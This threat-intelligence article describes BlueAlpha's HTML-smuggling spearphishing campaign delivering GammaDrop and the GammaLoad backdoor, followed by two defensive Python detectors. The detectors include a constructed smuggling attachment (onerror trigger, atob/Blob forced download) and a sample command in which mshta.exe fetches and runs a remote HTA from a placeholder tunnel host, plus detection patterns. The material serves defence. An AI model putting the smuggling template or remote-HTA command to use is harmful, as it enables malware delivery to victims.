The Russian state-sponsored group BlueAlpha has been identified as actively targeting Ukrainian individuals and organizations with spearphishing emails carrying malicious HTML attachments that deploy the GammaLoad malware. To avoid detection, BlueAlpha has adopted Cloudflare Tunnels to hide its infrastructure and has also implemented DNS fast-fluxing for its C2 servers. The campaign, which has been active since early 2024, demonstrates the persistent threat posed by Russian cyber actors.
Researchers have uncovered BlueAlpha's use of free Cloudflare Tunnels to disguise its GammaDrop malware staging infrastructure, with randomly generated subdomains serving as proxies to the actual server. Because of its simplicity and low cost, the technique has gained traction among attackers. BlueAlpha uses the tunnels to distribute GammaDrop via malicious .lnk files, continuing a recent trend in which attackers rely on Cloudflare Tunnels to circumvent detection, as seen in earlier campaigns delivering Remote Access Trojans (RATs) such as AsyncRAT.
Having moved from the onmousemove event to the onerror event of an img tag, the attackers use that handler to trigger deobfuscation of the malicious JavaScript in an XHTML attachment, while the page displays a message claiming that the file download has completed. After checking the operating system, the JavaScript decodes the smuggled archive, downloads it, and retrieves a tracking pixel from a location other than the GammaDrop staging server, potentially exposing an IP address.
A shortcut file encrypted within the archive then uses mshta.exe to download and execute a malicious HTA file from the staging server. This obfuscated HTA payload is GammaDrop, which deploys GammaLoad, a custom VBScript backdoor: GammaDrop writes GammaLoad to the user profile directory and establishes persistence through a Run key unless specific security software is active.
In addition, a blank Word document is opened, and the C2 IP address is stored in a hidden file. GammaLoad then beacons to the C2 server, sending victim data and fetching encoded VBScript for further malicious activity. To evade detection, it uses several communication methods, including plain-text HTTP, fast-flux DNS, and DNS over HTTPS (DoH).
According to the Insikt Group, defending against HTML smuggling attacks that embed JavaScript requires email security solutions capable of inspecting and blocking suspicious HTML events such as "onerror" and "onmousemove." Application control policies should restrict execution of "mshta.exe" and untrusted ".lnk" files, and endpoint detection should monitor "mshta.exe" for suspicious command-line arguments.
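The attachment-inspection recommendation above can be prototyped as a static triage step run over each HTML/XHTML attachment before delivery. The following Python scanner is an added example, not code from the Insikt Group report or from the campaign: it flags the inline event handlers used as execution triggers (the onerror and onmousemove handlers described earlier, plus a few common alternatives), the JavaScript plumbing that reassembles and force-downloads a payload in the browser, and unusually large base64 blobs. The two sample attachments and the "three or more indicators" blocking threshold are constructed for this example.

```python
"""Static triage of an HTML/XHTML mail attachment for HTML-smuggling indicators.

Added example, not code from the report or the campaign. The sample
attachments below are constructed for this example.
"""
import re
from html.parser import HTMLParser

# Inline event handlers that have no legitimate use in a mail attachment but
# serve as script triggers; onerror and onmousemove are the two the campaign used,
# the rest are common alternatives (constructed list).
SUSPICIOUS_EVENTS = {"onerror", "onmousemove", "onload", "onclick", "onmouseover"}

# Client-side payload reassembly and forced-download patterns, searched over the
# whole attachment so inline handler code is covered as well as <script> bodies.
SCRIPT_PATTERNS = {
    "base64_decode": re.compile(r"\batob\s*\("),
    "blob_construct": re.compile(r"\bnew\s+Blob\s*\("),
    "object_url": re.compile(r"URL\.createObjectURL\s*\("),
    "download_attr": re.compile(r"\.download\s*="),
    "os_probe": re.compile(r"navigator\.(userAgent|platform)"),
}
# A run of 200+ base64 characters is far longer than any legitimate inline value.
LARGE_BASE64 = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


class EventHandlerScanner(HTMLParser):
    """Collects every tag/attribute pair whose attribute is a suspicious event handler."""

    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        for name, _value in attrs:  # HTMLParser lower-cases attribute names
            if name in SUSPICIOUS_EVENTS:
                self.handlers.append(f"event_handler:{tag}@{name}")


def scan_html(content: str) -> dict:
    """Return the findings and a verdict ('block' when 3+ indicators co-occur)."""
    scanner = EventHandlerScanner()
    scanner.feed(content)
    findings = list(scanner.handlers)
    for label, pattern in SCRIPT_PATTERNS.items():
        if pattern.search(content):
            findings.append(f"script:{label}")
    if LARGE_BASE64.search(content):
        findings.append("payload:large_base64_blob")
    verdict = "block" if len(findings) >= 3 else "allow"
    return {"findings": findings, "verdict": verdict}


# Constructed sample mirroring the structure described above: a download-complete
# message, an <img onerror> trigger, an OS check, and a base64 archive written
# out through a Blob. The blob content is filler, not a real archive.
SMUGGLING_ATTACHMENT = (
    "<html><body><p>Your file has finished downloading.</p>\n"
    '<img src="x" onerror="run()">\n'
    "<script>\n"
    'var b = "' + "UEsDB" + "A" * 240 + '";\n'
    "function run(){\n"
    "  if (navigator.userAgent.indexOf('Windows') < 0) return;\n"
    "  var bytes = atob(b);\n"
    "  var blob = new Blob([bytes]);\n"
    "  var a = document.createElement('a');\n"
    "  a.href = URL.createObjectURL(blob); a.download = 'report.zip'; a.click();\n"
    "}\n</script></body></html>"
)

# Constructed benign attachment for comparison.
BENIGN_ATTACHMENT = (
    "<html><body><p>Agenda attached in the calendar invite.</p>"
    '<a href="https://example.com/agenda">Agenda</a></body></html>'
)

if __name__ == "__main__":
    for name, doc in (("smuggling", SMUGGLING_ATTACHMENT), ("benign", BENIGN_ATTACHMENT)):
        print(name, scan_html(doc))
```

The scanner deliberately reports each indicator separately rather than a single score, so a mail gateway can tune which combinations it blocks outright and which it quarantines for review; a lone onclick handler is common in marketing mail, whereas an onerror trigger next to atob and a Blob download has no benign explanation.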
Network traffic to TryCloudflare subdomains and unauthorized DoH connections should be closely monitored. Using threat intelligence platforms to analyze suspicious files, monitoring network activity in real time for targeted attacks, and staying informed about attacker techniques and indicators of compromise are essential to thwarting such threats.
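The endpoint and network recommendations in the two paragraphs above (mshta.exe command-line monitoring, TryCloudflare subdomain lookups, and unauthorized DoH connections) map directly onto three detection checks. The Python below is an added example, not code from the Insikt Group report: it runs those checks over constructed sample telemetry. The event field names (type, image, command_line, query, dest_ip, dest_port, sni) are assumptions modelled on Sysmon-style process-creation, DNS-query and network-connection events, the tunnel hostname and addresses in the sample are placeholders, and the empty approved-resolver list is a constructed policy.

```python
"""Detection checks for the post-delivery stages described above.

Added example, not code from the report. Field names are assumptions modelled
on Sysmon-style telemetry; the sample events are constructed.
"""
import re

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
INLINE_SCRIPT = re.compile(r"\b(vbscript|javascript):", re.IGNORECASE)
TRYCLOUDFLARE = re.compile(r"(^|\.)trycloudflare\.com$", re.IGNORECASE)

# Public DoH resolvers (well-known hostnames and anycast addresses).
DOH_HOSTS = {"dns.google", "cloudflare-dns.com", "mozilla.cloudflare-dns.com", "dns.quad9.net"}
DOH_IPS = {"8.8.8.8", "8.8.4.4", "1.1.1.1", "1.0.0.1", "9.9.9.9"}
# Resolvers the organisation has sanctioned for DoH; empty in this constructed policy.
APPROVED_DOH_HOSTS = set()
# Script hosts that should never talk to a DoH resolver directly.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}


def basename(path: str) -> str:
    """Lower-cased final component of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def check_process(ev: dict) -> list:
    """Any mshta.exe launch is reportable where application control forbids it;
    a remote URL or script-protocol handler in the command line is the stronger signal."""
    if basename(ev.get("image", "")) != "mshta.exe":
        return []
    reasons = ["mshta_execution"]
    cmd = ev.get("command_line", "")
    if REMOTE_URL.search(cmd):
        reasons.append("mshta_remote_url")
    if INLINE_SCRIPT.search(cmd):
        reasons.append("mshta_inline_script")
    return reasons


def check_dns(ev: dict) -> list:
    """Flag lookups under trycloudflare.com, the free-tunnel namespace the staging server hid behind."""
    query = ev.get("query", "").rstrip(".")
    return ["trycloudflare_subdomain"] if TRYCLOUDFLARE.search(query) else []


def check_connection(ev: dict) -> list:
    """Flag TLS connections to a DoH resolver that is not on the approved list,
    escalating when the source process is a script host."""
    if ev.get("dest_port") != 443:
        return []
    sni = ev.get("sni", "").lower()
    is_doh = sni in DOH_HOSTS or ev.get("dest_ip") in DOH_IPS
    if not is_doh or sni in APPROVED_DOH_HOSTS:
        return []
    reasons = ["unauthorized_doh"]
    if basename(ev.get("image", "")) in SCRIPT_HOSTS:
        reasons.append("doh_from_script_host")
    return reasons


CHECKS = {"process": check_process, "dns": check_dns, "connection": check_connection}


def triage(events: list) -> dict:
    """Map event id -> reasons for every event that trips at least one check."""
    hits = {}
    for ev in events:
        reasons = CHECKS.get(ev.get("type"), lambda _e: [])(ev)
        if reasons:
            hits[ev["id"]] = reasons
    return hits


# Constructed sample telemetry; hostname and addresses are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://example-words-here.trycloudflare.com/stage.hta",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"id": 2, "type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe", "parent_image": r"C:\Windows\explorer.exe"},
    {"id": 3, "type": "dns", "query": "example-words-here.trycloudflare.com."},
    {"id": 4, "type": "dns", "query": "www.example.com."},
    {"id": 5, "type": "connection", "image": r"C:\Windows\System32\wscript.exe",
     "dest_ip": "1.1.1.1", "dest_port": 443, "sni": "cloudflare-dns.com"},
    {"id": 6, "type": "connection", "image": r"C:\Program Files\Browser\browser.exe",
     "dest_ip": "203.0.113.10", "dest_port": 443, "sni": "www.example.com"},
]

if __name__ == "__main__":
    for event_id, reasons in triage(SAMPLE_EVENTS).items():
        print(event_id, reasons)
```

The DoH check is intentionally two-tiered: a browser reaching a public resolver is a policy question, but a VBScript host such as wscript.exe doing so matches the GammaLoad behaviour described above and deserves an immediate alert. Fast-flux C2 addresses are not matched here, since they change too quickly for a static list; the stable signals are the tunnel namespace and the process making the connection.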
